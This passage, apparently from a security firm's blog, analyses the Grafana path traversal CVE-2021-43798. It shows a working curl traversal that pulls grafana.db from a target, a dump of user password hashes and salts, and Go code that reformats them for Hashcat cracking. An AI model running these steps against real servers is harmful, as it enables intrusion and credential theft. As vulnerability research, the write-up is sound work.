Server:\u002Fetc\u002FX11\u002Ffs:\u002Fsbin\u002Fnologin\n",[1373,107934,107935],{"class":1375,"line":6776},[1373,107936,107937],{"class":2206},"games:x:35:35:games:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\n",[1373,107939,107940],{"class":1375,"line":6781},[1373,107941,107942],{"class":2206},"cyrus:x:85:12::\u002Fusr\u002Fcyrus:\u002Fsbin\u002Fnologin\n",[1373,107944,107945],{"class":1375,"line":7524},[1373,107946,107947],{"class":2206},"vpopmail:x:89:89::\u002Fvar\u002Fvpopmail:\u002Fsbin\u002Fnologin\n",[1373,107949,107950],{"class":1375,"line":7530},[1373,107951,107952],{"class":2206},"ntp:x:123:123:NTP:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\n",[1373,107954,107955],{"class":1375,"line":7546},[1373,107956,107957],{"class":2206},"smmsp:x:209:209:smmsp:\u002Fvar\u002Fspool\u002Fmqueue:\u002Fsbin\u002Fnologin\n",[1373,107959,107960],{"class":1375,"line":7571},[1373,107961,107962],{"class":2206},"guest:x:405:100:guest:\u002Fdev\u002Fnull:\u002Fsbin\u002Fnologin\n",[1373,107964,107965],{"class":1375,"line":7598},[1373,107966,107967],{"class":2206},"nobody:x:65534:65534:nobody:\u002F:\u002Fsbin\u002Fnologin\n",[1373,107969,107970,107973],{"class":1375,"line":7615},[1373,107971,107972],{"class":2206},"grafana:x:472:0:Linux",[1373,107974,107975],{"class":1391}," User,,,:\u002Fhome\u002Fgrafana:\u002Fsbin\u002Fnologin\n",[18,107977,107978,107979,107981,107982,107984,107985,107990],{},"The example above shows an attacker reading ",[886,107980,87550],{}," from the victim Grafana. Reading ",[886,107983,87550],{}," is essentially useless for an attacker, but VulnCheck has archived a large number of public CVE-2021-43798 exploits that do exactly that. Those exploits are useless, for anything other than vulnerability scanners and ",[47,107986,107989],{"href":107987,"rel":107988},"https:\u002F\u002Fhackerone.com\u002Freports\u002F1419213",[51],"bug bounty hunters",", because they don’t demonstrate a real security impact.",[18,107992,107993,107996,107997,108001,108002,10515,108005,14193,108010,108012,108013,108018],{},[295,107994,107995],{},"Some"," public CVE-2021-43798 exploits have tried to demonstrate real impact. ",[47,107998,36852],{"href":107999,"rel":108000},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002F6727c1b344382fe2e56bb2a1c4343b09e40b64c8\u002Fmodules\u002Fauxiliary\u002Fscanner\u002Fhttp\u002Fgrafana_plugin_traversal.rb",[51],", for example, uses CVE-2021-43798 to download the server’s ",[886,108003,108004],{},"grafana.ini",[47,108006,108009],{"href":108007,"rel":108008},"https:\u002F\u002Fgithub.com\u002Fgrafana\u002Fgrafana\u002Fblob\u002Fmain\u002Fconf\u002Fdefaults.ini",[51],"configuration file",[886,108011,108004],{}," can potentially leak interesting secrets (e.g. ",[47,108014,108017],{"href":108015,"rel":108016},"https:\u002F\u002Fgrafana.com\u002Fdocs\u002Fgrafana\u002Flatest\u002Fsetup-grafana\u002Fconfigure-security\u002Fconfigure-authentication\u002Fokta\u002F",[51],"Okta OAuth2"," configuration), but a standard install using a default configuration is almost entirely devoid of anything useful to an attacker.",[18,108020,108021,108022,108026],{},"CVE-2021-43798 was a zero-day for only a short time. Grafana released an official patch on December 7, 2021. A couple of days later, the security industry became lost to the hysteria of ",[47,108023,83636],{"href":108024,"rel":108025},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FLog4Shell%E2%80%8B%E2%80%8B",[51],", and CVE-2021-43798 was pushed to the backburner before fading into obscurity.",[18,108028,108029,108030,108035],{},"But, a bit over a year later, thousands of servers remain vulnerable to CVE-2021-43798. A review of the approximately ",[47,108031,108034],{"href":108032,"rel":108033},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Grafana%22",[51],"95,000"," Grafana instances indexed by Shodan found that 7,500 (about 8%) are still vulnerable.",[1925,108037,108038],{},[18,108039,108040],{},"Vulnerable Internet-Facing Grafana Instances",[11128,108042],{":labels":108043,":values":108044},"[\"8.0.0\",\"8.0.1\",\"8.0.2\",\"8.0.3\",\"8.0.4\",\"8.0.5\",\"8.0.6\",\"8.1.0\",\"8.1.1\",\"8.1.2\",\"8.1.3\",\"8.1.4\",\"8.1.5\",\"8.1.6\",\"8.1.7\",\"8.2.0\",\"8.2.1\",\"8.2.2\",\"8.2.3\",\"8.2.4\",\"8.2.5\",\"8.2.6\",\"8.3.0\"]","[213,121,143,482,352,321,687,180,401,729,270,107,518,120,58,255,440,577,526,186,447,206,296]",[18,108046,108047,108048,108051,108052,108057,108058,108062],{},"CVE-2021-43798 has never been publicly linked to a named adversary. You won’t find it in any threat group reports, botnet rundowns, or the ",[47,108049,100825],{"href":2864,"rel":108050},[51],". But it does appear to be actively exploited. ",[47,108053,108056],{"href":108054,"rel":108055},"https:\u002F\u002Fwww.fortiguard.com\u002Fencyclopedia\u002Fips\u002F51075",[51],"FortiGuard Labs IP Threat Encyclopedia"," shows hundreds of CVE-2021-43798 exploitation attempts pers day. ",[47,108059,86601],{"href":108060,"rel":108061},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002F?gnql=raw_data.web.paths%3A%22%2Fpublic%2Fplugins%2F%22%20classification%3Amalicious",[51]," also shows a number of malicious IP addresses probing for vulnerable hosts:",[18,108064,108065],{},[68,108066],{":width":10862,"alt":108067,"src":108068},"Grafana Probes","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fgreynoise-grafana.png",[18,108070,108071,108072,108075],{},"With thousands of vulnerable servers and, what appears to be, active probing for the vulnerability, it left us wondering if there was more to this vulnerability. At VulnCheck, our ",[47,108073,91940],{"href":45535,"rel":108074},[51]," program has had decent success chaining information leak vulnerabilities with authenticated attacks to achieve initial access. Could CVE-2021-43798 be one of those useful information leaks?",[61,108077,108079],{"id":108078},"finding-a-more-useful-information-leak","Finding a More Useful Information Leak",[18,108081,108082,108083,982,108085,108088,108089,108092,108093,108095],{},"As mentioned, early exploits leaked ",[886,108084,87550],{},[886,108086,108087],{},"\u002Fetc\u002Fgrafana\u002Fgrafana.ini"," (or a variant of that path), but they weren’t likely to be useful for establishing initial access to the Grafana system. Another early suggestion was to leak SSH keys, but that isn’t a realistic target either. A secure Grafana install will be executed as a low-privileged ",[886,108090,108091],{},"grafana"," user. Access to SSH keys shouldn’t be possible, and, even if it was, there is little reason for a Grafana server to contain any useful SSH ",[1131,108094,16703],{}," keys.",[18,108097,108098,108099,108104],{},"There is ",[47,108100,108103],{"href":108101,"rel":108102},"https:\u002F\u002Fnusgreyhats.org\u002Fposts\u002Fwriteups\u002Fa-not-so-deep-dive-in-to-grafana-cve-2021-43798\u002F",[51],"one"," early writeup that discuss exfiltrating the SQLite database that backs Grafana. An SQLite database is just a file, so an attacker using CVE-2021-43798 can grab a copy of the database. As you can see below, the database contains a bunch of interesting looking tables.",[1354,108106,108108],{"className":31740,"code":108107,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -o grafana.db --path-as-is http:\u002F\u002F10.9.49.222:3000\u002Fpublic\u002Fplugins\u002Fwelcome\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fvar\u002Flib\u002Fgrafana\u002Fgrafana.db\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n100 3544k 100 3544k 0 0 627k 0 0:00:05 0:00:05 --:--:-- 662k\nalbinolobster@mournland:~$ sqlite3 grafana.db\nSQLite version 3.31.1 2020-01-27 19:55:54\nEnter \".help\" for usage hints.\nsqlite> .tables\nalert login_attempt \nalert_configuration migration_log \nalert_instance ngalert_configuration \nalert_notification org \nalert_notification_state org_user \nalert_rule playlist \nalert_rule_tag playlist_item \nalert_rule_version plugin_setting \nannotation preferences \nannotation_tag quota \napi_key server_lock \ncache_data session \ndashboard short_url \ndashboard_acl star \ndashboard_provisioning tag \ndashboard_snapshot team \ndashboard_tag team_member \ndashboard_version temp_user \ndata_source test_data \nkv_store user \nlibrary_element user_auth \nlibrary_element_connection user_auth_token \nsqlite>\n",[886,108109,108110,108126,108162,108182,108216,108225,108237,108253,108262,108272,108282,108292,108303,108314,108324,108334,108345,108356,108367,108376,108387,108397,108408,108418,108428,108438,108448,108458,108468,108478,108489],{"__ignoreMap":219},[1373,108111,108112,108114,108116,108118,108121,108123],{"class":1375,"line":1376},[1373,108113,55482],{"class":2206},[1373,108115,2222],{"class":1391},[1373,108117,39692],{"class":2209},[1373,108119,108120],{"class":1391}," grafana.db",[1373,108122,107823],{"class":2209},[1373,108124,108125],{"class":1391}," http:\u002F\u002F10.9.49.222:3000\u002Fpublic\u002Fplugins\u002Fwelcome\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fvar\u002Flib\u002Fgrafana\u002Fgrafana.db\n",[1373,108127,108128,108131,108134,108137,108140,108142,108145,108148,108151,108154,108157,108159],{"class":1375,"line":220},[1373,108129,108130],{"class":2206}," %",[1373,108132,108133],{"class":1391}," Total",[1373,108135,108136],{"class":1391}," %",[1373,108138,108139],{"class":1391}," Received",[1373,108141,78784],{"class":1391},[1373,108143,108144],{"class":1391}," Xferd",[1373,108146,108147],{"class":1391}," Average",[1373,108149,108150],{"class":1391}," Speed",[1373,108152,108153],{"class":1391}," Time",[1373,108155,108156],{"class":1391}," Time",[1373,108158,108156],{"class":1391},[1373,108160,108161],{"class":1391}," Current\n",[1373,108163,108164,108167,108170,108173,108176,108179],{"class":1375,"line":1266},[1373,108165,108166],{"class":2206}," Dload",[1373,108168,108169],{"class":1391}," Upload",[1373,108171,108172],{"class":1391}," Total",[1373,108174,108175],{"class":1391}," Spent",[1373,108177,108178],{"class":1391}," Left",[1373,108180,108181],{"class":1391}," Speed\n",[1373,108183,108184,108186,108189,108192,108194,108197,108200,108203,108205,108208,108210,108213],{"class":1375,"line":1852},[1373,108185,48221],{"class":2206},[1373,108187,108188],{"class":1391}," 3544k",[1373,108190,108191],{"class":5467}," 100",[1373,108193,108188],{"class":1391},[1373,108195,108196],{"class":5467}," 0",[1373,108198,108199],{"class":5467}," 0",[1373,108201,108202],{"class":1391}," 627k",[1373,108204,108196],{"class":5467},[1373,108206,108207],{"class":1391}," 0:00:05",[1373,108209,108207],{"class":1391},[1373,108211,108212],{"class":2209}," --:--:--",[1373,108214,108215],{"class":1391}," 662k\n",[1373,108217,108218,108220,108222],{"class":1375,"line":4692},[1373,108219,55482],{"class":2206},[1373,108221,69543],{"class":1391},[1373,108223,108224],{"class":1391}," grafana.db\n",[1373,108226,108227,108229,108231,108233,108235],{"class":1375,"line":4724},[1373,108228,69550],{"class":2206},[1373,108230,45880],{"class":1391},[1373,108232,69555],{"class":5467},[1373,108234,69558],{"class":1391},[1373,108236,69561],{"class":1391},[1373,108238,108239,108241,108243,108245,108247,108249,108251],{"class":1375,"line":4756},[1373,108240,55798],{"class":2206},[1373,108242,4883],{"class":1387},[1373,108244,69570],{"class":1391},[1373,108246,183],{"class":1387},[1373,108248,55807],{"class":1391},[1373,108250,69577],{"class":1391},[1373,108252,69580],{"class":1391},[1373,108254,108255,108257,108259],{"class":1375,"line":4768},[1373,108256,69585],{"class":2206},[1373,108258,69588],{"class":4640},[1373,108260,108261],{"class":1391},".tables\n",[1373,108263,108264,108266,108269],{"class":1375,"line":4792},[1373,108265,99066],{"class":2206},[1373,108267,108268],{"class":1391}," login_attempt",[1373,108270,108271],{"class":4640}," \n",[1373,108273,108274,108277,108280],{"class":1375,"line":4798},[1373,108275,108276],{"class":2206},"alert_configuration",[1373,108278,108279],{"class":1391}," migration_log",[1373,108281,108271],{"class":4640},[1373,108283,108284,108287,108290],{"class":1375,"line":4806},[1373,108285,108286],{"class":2206},"alert_instance",[1373,108288,108289],{"class":1391}," ngalert_configuration",[1373,108291,47181],{"class":4640},[1373,108293,108294,108297,108300],{"class":1375,"line":4817},[1373,108295,108296],{"class":2206},"alert_notification",[1373,108298,108299],{"class":1391}," org",[1373,108301,108302],{"class":4640}," \n",[1373,108304,108305,108308,108311],{"class":1375,"line":4825},[1373,108306,108307],{"class":2206},"alert_notification_state",[1373,108309,108310],{"class":1391}," org_user",[1373,108312,108313],{"class":4640}," \n",[1373,108315,108316,108319,108322],{"class":1375,"line":4835},[1373,108317,108318],{"class":2206},"alert_rule",[1373,108320,108321],{"class":1391}," playlist",[1373,108323,108313],{"class":4640},[1373,108325,108326,108329,108332],{"class":1375,"line":4843},[1373,108327,108328],{"class":2206},"alert_rule_tag",[1373,108330,108331],{"class":1391}," playlist_item",[1373,108333,108271],{"class":4640},[1373,108335,108336,108339,108342],{"class":1375,"line":4849},[1373,108337,108338],{"class":2206},"alert_rule_version",[1373,108340,108341],{"class":1391}," plugin_setting",[1373,108343,108344],{"class":4640}," \n",[1373,108346,108347,108350,108353],{"class":1375,"line":4877},[1373,108348,108349],{"class":2206},"annotation",[1373,108351,108352],{"class":1391}," preferences",[1373,108354,108355],{"class":4640}," \n",[1373,108357,108358,108361,108364],{"class":1375,"line":4915},[1373,108359,108360],{"class":2206},"annotation_tag",[1373,108362,108363],{"class":1391}," quota",[1373,108365,108366],{"class":4640}," \n",[1373,108368,108369,108371,108374],{"class":1375,"line":4931},[1373,108370,63630],{"class":2206},[1373,108372,108373],{"class":1391}," server_lock",[1373,108375,108355],{"class":4640},[1373,108377,108378,108381,108384],{"class":1375,"line":4947},[1373,108379,108380],{"class":2206},"cache_data",[1373,108382,108383],{"class":1391}," session",[1373,108385,108386],{"class":4640}," \n",[1373,108388,108389,108392,108395],{"class":1375,"line":4952},[1373,108390,108391],{"class":2206},"dashboard",[1373,108393,108394],{"class":1391}," short_url",[1373,108396,49384],{"class":4640},[1373,108398,108399,108402,108405],{"class":1375,"line":6776},[1373,108400,108401],{"class":2206},"dashboard_acl",[1373,108403,108404],{"class":1391}," star",[1373,108406,108407],{"class":4640}," \n",[1373,108409,108410,108413,108416],{"class":1375,"line":6781},[1373,108411,108412],{"class":2206},"dashboard_provisioning",[1373,108414,108415],{"class":1391}," tag",[1373,108417,108302],{"class":4640},[1373,108419,108420,108423,108426],{"class":1375,"line":7524},[1373,108421,108422],{"class":2206},"dashboard_snapshot",[1373,108424,108425],{"class":1391}," team",[1373,108427,108407],{"class":4640},[1373,108429,108430,108433,108436],{"class":1375,"line":7530},[1373,108431,108432],{"class":2206},"dashboard_tag",[1373,108434,108435],{"class":1391}," team_member",[1373,108437,108355],{"class":4640},[1373,108439,108440,108443,108446],{"class":1375,"line":7546},[1373,108441,108442],{"class":2206},"dashboard_version",[1373,108444,108445],{"class":1391}," temp_user",[1373,108447,49384],{"class":4640},[1373,108449,108450,108453,108456],{"class":1375,"line":7571},[1373,108451,108452],{"class":2206},"data_source",[1373,108454,108455],{"class":1391}," test_data",[1373,108457,49384],{"class":4640},[1373,108459,108460,108463,108466],{"class":1375,"line":7598},[1373,108461,108462],{"class":2206},"kv_store",[1373,108464,108465],{"class":1391}," user",[1373,108467,108407],{"class":4640},[1373,108469,108470,108473,108476],{"class":1375,"line":7615},[1373,108471,108472],{"class":2206},"library_element",[1373,108474,108475],{"class":1391}," user_auth",[1373,108477,49384],{"class":4640},[1373,108479,108480,108483,108486],{"class":1375,"line":7635},[1373,108481,108482],{"class":2206},"library_element_connection",[1373,108484,108485],{"class":1391}," user_auth_token",[1373,108487,108488],{"class":4640}," \n",[1373,108490,108491,108493],{"class":1375,"line":7640},[1373,108492,69585],{"class":2206},[1373,108494,6765],{"class":4640},[18,108496,108497,108498,108500,108501,1246,108504,1255,108506,108508,108509,108511],{},"The aforementioned write-up focuses on the ",[886,108499,108452],{}," table. That seems like an odd choice when there are other juicy looking table names like ",[886,108502,108503],{},"user_auth_token",[886,108505,63630],{},[886,108507,4664],{},". But, it turns out that Grafana does an excellent job of hashing sensitive data with large random values to make it “impossible” for attackers to quickly recover credentials. The sole exception appears to be the data stored in the ",[886,108510,108452],{}," table.",[18,108513,108514,108515,108511],{},"Grafana, being a data visualization tool, needs external sources of data, such as databases. Grafana needs to know how to authenticate with those databases. Those credentials are stored encrypted (but easily unencrypted) in the ",[886,108516,108452],{},[18,108518,108519,108520,108523,108524,108526,108527,108529],{},"Without going into specifics (I’d suggest reading the linked, ",[1131,108521,108522],{},"A (not so deep) Dive into Grafana CVE-2021-43798",", if you are interested), attackers that can access the ",[886,108525,108004],{}," file and ",[886,108528,108452],{}," table, can trivially decrypt the passwords to Grafana’s external data sources. That’s quite interesting, but likely has three significant drawbacks from an initial access perspective:",[1789,108531,108532,108535,108538],{},[25,108533,108534],{},"The data sources are less likely to be directly reachable over the internet. Exposing Grafana to the internet is unwise, but likely done intentionally. To expose a production database to the internet is a grave error. The expectation is that many data sources won’t be remotely accessible by an attacker from the internet.",[25,108536,108537],{},"Even if the attacker can reach the data source, only certain types of data sources are going to be useful for initial access purposes. For example, the attacker would welcome access to a PostgreSQL database because it contains features that might allow an attacker to execute arbitrary OS commands. But a Grafana whose only data source is CloudWatch won’t offer that same type of functionality.",[25,108539,108540],{},"Finally, let’s say an attacker can access a PostgreSQL data source. Grafana tells administrators to provide low-privileged\u002Fread-only access to Grafana for security reasons. A properly configured account will block Grafana from abusing the command execution feature.",[18,108542,108543,108544,108546,108547,108552],{},"So while ",[886,108545,108452],{}," is interesting (and even featured on a ",[47,108548,108551],{"href":108549,"rel":108550},"https:\u002F\u002Fwww.hackthebox.com\u002F",[51],"HackTheBox"," target). The drawbacks are too significant.",[61,108554,108556],{"id":108555},"guessing-credentials","Guessing Credentials",[18,108558,108559,108560,108562,108563,108565],{},"Instead, we thought another table offered more realistic chances for obtaining additional access. Unsurprisingly, it’s the ",[886,108561,39933],{}," table. The ",[886,108564,39933],{}," table contains usernames, hashed passwords, and salts:",[1354,108567,108570],{"className":108568,"code":108569,"language":1359,"meta":219},[1357],"sqlite> select * from user;\nid|version|login|email|name|password|salt|rands|company|org_id|is_admin|email_verified|theme|created|updated|help_flags1|last_seen_at|is_disabled\n1|0|admin|admin@localhost||e21680070fb3a72d8cac29819eb74ddbee669a9d362dea5c4674d8287e4a1df22424fcdd00ab0cc8230d4249296adc2adca8|NcgfTdzwPc|wXslOqTqT0||1|1|0||2023-02-09 23:12:45|2023-02-13 21:25:51|0|2023-02-13 21:25:26|0\n2|0|viewer|viewer|Jake|18e6160a5e7e03a7dea259195b27543c2d1b515e4490867c73ffb6214d08f77163ecc0f58321a40deb300ec563c15a327733|13CdHYK4Xl|z5w6xlWQWI||1|0|0||2023-02-10 18:02:31|2023-02-13 21:27:21|0|2023-02-13 21:26:56|0\n3|0|ro|ro|ro|20ae2e2828c004ef4638f6d490a23aa9956cc4bfeb1db60abd18930f97099782037c6861518b466e20addc36dfda5f564d78|bhhVgTns9o|w2lzkKgwWN||1|0|0||2023-02-10 18:17:14|2023-02-13 21:26:39|0|2023-02-13 21:26:24|0\n",[886,108571,108569],{"__ignoreMap":219},[18,108573,108574,108575,4606],{},"The hashes are created using PBKDF2-HMAC-SHA256. See lines 145-148 of ",[47,108576,108579],{"href":108577,"rel":108578},"https:\u002F\u002Fgithub.com\u002Fgrafana\u002Fgrafana\u002Fblob\u002Fmain\u002Fpkg\u002Futil\u002Fencryption.go#L145",[51],"grafana\u002Fblob\u002Fmain\u002Fpkg\u002Futil\u002Fencryption.go",[1354,108581,108583],{"className":19022,"code":108582,"language":19024,"meta":219,"style":219},"\u002F\u002F Key needs to be 32bytes\nfunc encryptionKeyToBytes(secret, salt string) ([]byte, error) {\n return pbkdf2.Key([]byte(secret), []byte(salt), 10000, 32, sha256.New), nil\n}\n",[886,108584,108585,108590,108625,108679],{"__ignoreMap":219},[1373,108586,108587],{"class":1375,"line":1376},[1373,108588,108589],{"class":4630},"\u002F\u002F Key needs to be 32bytes\n",[1373,108591,108592,108594,108597,108599,108602,108604,108607,108609,108611,108614,108616,108618,108621,108623],{"class":1375,"line":220},[1373,108593,19088],{"class":1397},[1373,108595,108596],{"class":7297}," encryptionKeyToBytes",[1373,108598,1384],{"class":1383},[1373,108600,108601],{"class":19096},"secret",[1373,108603,5437],{"class":1383},[1373,108605,108606],{"class":19096}," salt",[1373,108608,15757],{"class":7293},[1373,108610,2230],{"class":1383},[1373,108612,108613],{"class":1383}," ([]",[1373,108615,82979],{"class":7293},[1373,108617,5437],{"class":1383},[1373,108619,108620],{"class":7293}," error",[1373,108622,2230],{"class":1383},[1373,108624,4765],{"class":1383},[1373,108626,108627,108629,108632,108634,108636,108638,108640,108642,108644,108646,108648,108650,108652,108655,108657,108660,108662,108665,108667,108670,108672,108674,108676],{"class":1375,"line":1266},[1373,108628,7340],{"class":4636},[1373,108630,108631],{"class":4640}," pbkdf2",[1373,108633,59],{"class":1383},[1373,108635,15996],{"class":7297},[1373,108637,82976],{"class":1383},[1373,108639,82979],{"class":7293},[1373,108641,1384],{"class":1383},[1373,108643,108601],{"class":4640},[1373,108645,15534],{"class":1383},[1373,108647,66801],{"class":1383},[1373,108649,82979],{"class":7293},[1373,108651,1384],{"class":1383},[1373,108653,108654],{"class":4640},"salt",[1373,108656,15534],{"class":1383},[1373,108658,108659],{"class":5467}," 10000",[1373,108661,5437],{"class":1383},[1373,108663,108664],{"class":5467}," 32",[1373,108666,5437],{"class":1383},[1373,108668,108669],{"class":4640}," sha256",[1373,108671,59],{"class":1383},[1373,108673,97132],{"class":4640},[1373,108675,15534],{"class":1383},[1373,108677,108678],{"class":7054}," nil\n",[1373,108680,108681],{"class":1375,"line":1852},[1373,108682,1855],{"class":1383},[18,108684,108685,108686,108691],{},"PBKDF2-HMAC-SHA256 is an algorithm understood by ",[47,108687,108690],{"href":108688,"rel":108689},"https:\u002F\u002Fhashcat.net\u002Fhashcat\u002F",[51],"Hashcat",", the password cracking tool. The Grafana user table just needs to be transformed into a format that Hashcat can read. This is achieved with a small amount of Go:",[1354,108693,108695],{"className":19022,"code":108694,"language":19024,"meta":219,"style":219},"\u002F\u002F grab the usernames, passwords and salts from the downloaded db\nrows, err := db.Query(\"select email,password,salt,is_admin from user\")\nif err != nil {\n return\n}\ndefer rows.Close()\n\nfor rows.Next() {\n var email string\n var password string\n var salt string\n err = rows.Scan(&email, &password, &salt)\n if err != nil {\n return false\n }\n\n decoded_hash, _ := hex.DecodeString(password)\n hash64 := b64.StdEncoding.EncodeToString([]byte(decoded_hash))\n salt64 := b64.StdEncoding.EncodeToString([]byte(salt))\n _, _ = hash_file.WriteString(\"sha256:10000:\" + salt64 + \":\" + hash64 + \"\\n\")\n}\n",[886,108696,108697,108702,108731,108743,108747,108751,108765,108769,108784,108794,108803,108812,108846,108858,108864,108868,108872,108896,108924,108951,109006],{"__ignoreMap":219},[1373,108698,108699],{"class":1375,"line":1376},[1373,108700,108701],{"class":4630},"\u002F\u002F grab the usernames, passwords and salts from the downloaded db\n",[1373,108703,108704,108707,108709,108711,108713,108716,108718,108720,108722,108724,108727,108729],{"class":1375,"line":220},[1373,108705,108706],{"class":4640},"rows",[1373,108708,5437],{"class":1383},[1373,108710,90303],{"class":4640},[1373,108712,20584],{"class":1397},[1373,108714,108715],{"class":4640}," db",[1373,108717,59],{"class":1383},[1373,108719,105547],{"class":7297},[1373,108721,1384],{"class":1383},[1373,108723,183],{"class":1387},[1373,108725,108726],{"class":1391},"select email,password,salt,is_admin from user",[1373,108728,183],{"class":1387},[1373,108730,11875],{"class":1383},[1373,108732,108733,108735,108737,108739,108741],{"class":1375,"line":1266},[1373,108734,4637],{"class":4636},[1373,108736,90303],{"class":4640},[1373,108738,15677],{"class":1397},[1373,108740,19247],{"class":7054},[1373,108742,4765],{"class":1383},[1373,108744,108745],{"class":1375,"line":1852},[1373,108746,78549],{"class":4636},[1373,108748,108749],{"class":1375,"line":4692},[1373,108750,1855],{"class":1383},[1373,108752,108753,108756,108759,108761,108763],{"class":1375,"line":4724},[1373,108754,108755],{"class":4636},"defer",[1373,108757,108758],{"class":4640}," rows",[1373,108760,59],{"class":1383},[1373,108762,90791],{"class":7297},[1373,108764,27326],{"class":1383},[1373,108766,108767],{"class":1375,"line":4756},[1373,108768,6520],{"emptyLinePlaceholder":237},[1373,108770,108771,108773,108775,108777,108780,108782],{"class":1375,"line":4768},[1373,108772,98551],{"class":4636},[1373,108774,108758],{"class":4640},[1373,108776,59],{"class":1383},[1373,108778,108779],{"class":7297},"Next",[1373,108781,7514],{"class":1383},[1373,108783,4765],{"class":1383},[1373,108785,108786,108788,108791],{"class":1375,"line":4792},[1373,108787,90591],{"class":1397},[1373,108789,108790],{"class":4640}," email ",[1373,108792,108793],{"class":7293},"string\n",[1373,108795,108796,108798,108801],{"class":1375,"line":4798},[1373,108797,90591],{"class":1397},[1373,108799,108800],{"class":4640}," password ",[1373,108802,108793],{"class":7293},[1373,108804,108805,108807,108810],{"class":1375,"line":4806},[1373,108806,90591],{"class":1397},[1373,108808,108809],{"class":4640}," salt ",[1373,108811,108793],{"class":7293},[1373,108813,108814,108817,108819,108821,108823,108826,108828,108830,108832,108834,108836,108838,108840,108842,108844],{"class":1375,"line":4817},[1373,108815,108816],{"class":4640}," err ",[1373,108818,5417],{"class":1397},[1373,108820,108758],{"class":4640},[1373,108822,59],{"class":1383},[1373,108824,108825],{"class":7297},"Scan",[1373,108827,1384],{"class":1383},[1373,108829,7218],{"class":1397},[1373,108831,105920],{"class":4640},[1373,108833,5437],{"class":1383},[1373,108835,87587],{"class":1397},[1373,108837,86310],{"class":4640},[1373,108839,5437],{"class":1383},[1373,108841,87587],{"class":1397},[1373,108843,108654],{"class":4640},[1373,108845,11875],{"class":1383},[1373,108847,108848,108850,108852,108854,108856],{"class":1375,"line":4825},[1373,108849,4695],{"class":4636},[1373,108851,90303],{"class":4640},[1373,108853,15677],{"class":1397},[1373,108855,19247],{"class":7054},[1373,108857,4765],{"class":1383},[1373,108859,108860,108862],{"class":1375,"line":4835},[1373,108861,97593],{"class":4636},[1373,108863,16195],{"class":14985},[1373,108865,108866],{"class":1375,"line":4843},[1373,108867,4795],{"class":1383},[1373,108869,108870],{"class":1375,"line":4849},[1373,108871,6520],{"emptyLinePlaceholder":237},[1373,108873,108874,108877,108879,108881,108883,108885,108887,108890,108892,108894],{"class":1375,"line":4877},[1373,108875,108876],{"class":4640}," decoded_hash",[1373,108878,5437],{"class":1383},[1373,108880,90724],{"class":4640},[1373,108882,20584],{"class":1397},[1373,108884,89478],{"class":4640},[1373,108886,59],{"class":1383},[1373,108888,108889],{"class":7297},"DecodeString",[1373,108891,1384],{"class":1383},[1373,108893,86310],{"class":4640},[1373,108895,11875],{"class":1383},[1373,108897,108898,108901,108903,108905,108907,108909,108911,108913,108915,108917,108919,108922],{"class":1375,"line":4915},[1373,108899,108900],{"class":4640}," hash64 ",[1373,108902,20584],{"class":1397},[1373,108904,82963],{"class":4640},[1373,108906,59],{"class":1383},[1373,108908,82968],{"class":4640},[1373,108910,59],{"class":1383},[1373,108912,82973],{"class":7297},[1373,108914,82976],{"class":1383},[1373,108916,82979],{"class":7293},[1373,108918,1384],{"class":1383},[1373,108920,108921],{"class":4640},"decoded_hash",[1373,108923,16761],{"class":1383},[1373,108925,108926,108929,108931,108933,108935,108937,108939,108941,108943,108945,108947,108949],{"class":1375,"line":4931},[1373,108927,108928],{"class":4640}," salt64 ",[1373,108930,20584],{"class":1397},[1373,108932,82963],{"class":4640},[1373,108934,59],{"class":1383},[1373,108936,82968],{"class":4640},[1373,108938,59],{"class":1383},[1373,108940,82973],{"class":7297},[1373,108942,82976],{"class":1383},[1373,108944,82979],{"class":7293},[1373,108946,1384],{"class":1383},[1373,108948,108654],{"class":4640},[1373,108950,16761],{"class":1383},[1373,108952,108953,108955,108957,108959,108961,108964,108966,108969,108971,108973,108976,108978,108980,108983,108985,108987,108989,108991,108993,108996,108998,109000,109002,109004],{"class":1375,"line":4947},[1373,108954,90746],{"class":4640},[1373,108956,5437],{"class":1383},[1373,108958,90724],{"class":4640},[1373,108960,5417],{"class":1397},[1373,108962,108963],{"class":4640}," hash_file",[1373,108965,59],{"class":1383},[1373,108967,108968],{"class":7297},"WriteString",[1373,108970,1384],{"class":1383},[1373,108972,183],{"class":1387},[1373,108974,108975],{"class":1391},"sha256:10000:",[1373,108977,183],{"class":1387},[1373,108979,15478],{"class":1397},[1373,108981,108982],{"class":4640}," salt64 ",[1373,108984,15448],{"class":1397},[1373,108986,4883],{"class":1387},[1373,108988,4606],{"class":1391},[1373,108990,183],{"class":1387},[1373,108992,15478],{"class":1397},[1373,108994,108995],{"class":4640}," hash64 ",[1373,108997,15448],{"class":1397},[1373,108999,4883],{"class":1387},[1373,109001,8943],{"class":2326},[1373,109003,183],{"class":1387},[1373,109005,11875],{"class":1383},[1373,109007,109008],{"class":1375,"line":4952},[1373,109009,1855],{"class":1383},[18,109011,109012,109013,109015],{},"The example code above will transform the previously shown ",[886,109014,39933],{}," table into the following Hashcat-ingestable hashes:",[1354,109017,109020],{"className":109018,"code":109019,"language":1359,"meta":219},[1357],"sha256:10000:TmNnZlRkendQYw==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg=\nsha256:10000:MTNDZEhZSzRYbA==:GOYWCl5+A6feolkZWydUPC0bUV5EkIZ8c\u002F+2IU0I93Fj7MD1gyGkDeswDsVjwVoydzM=\nsha256:10000:YmhoVmdUbnM5bw==:IK4uKCjABO9GOPbUkKI6qZVsxL\u002FrHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg=\n",[886,109021,109019],{"__ignoreMap":219},[18,109023,109024,109025,109029],{},"At this point, it’s useful to know that Grafana 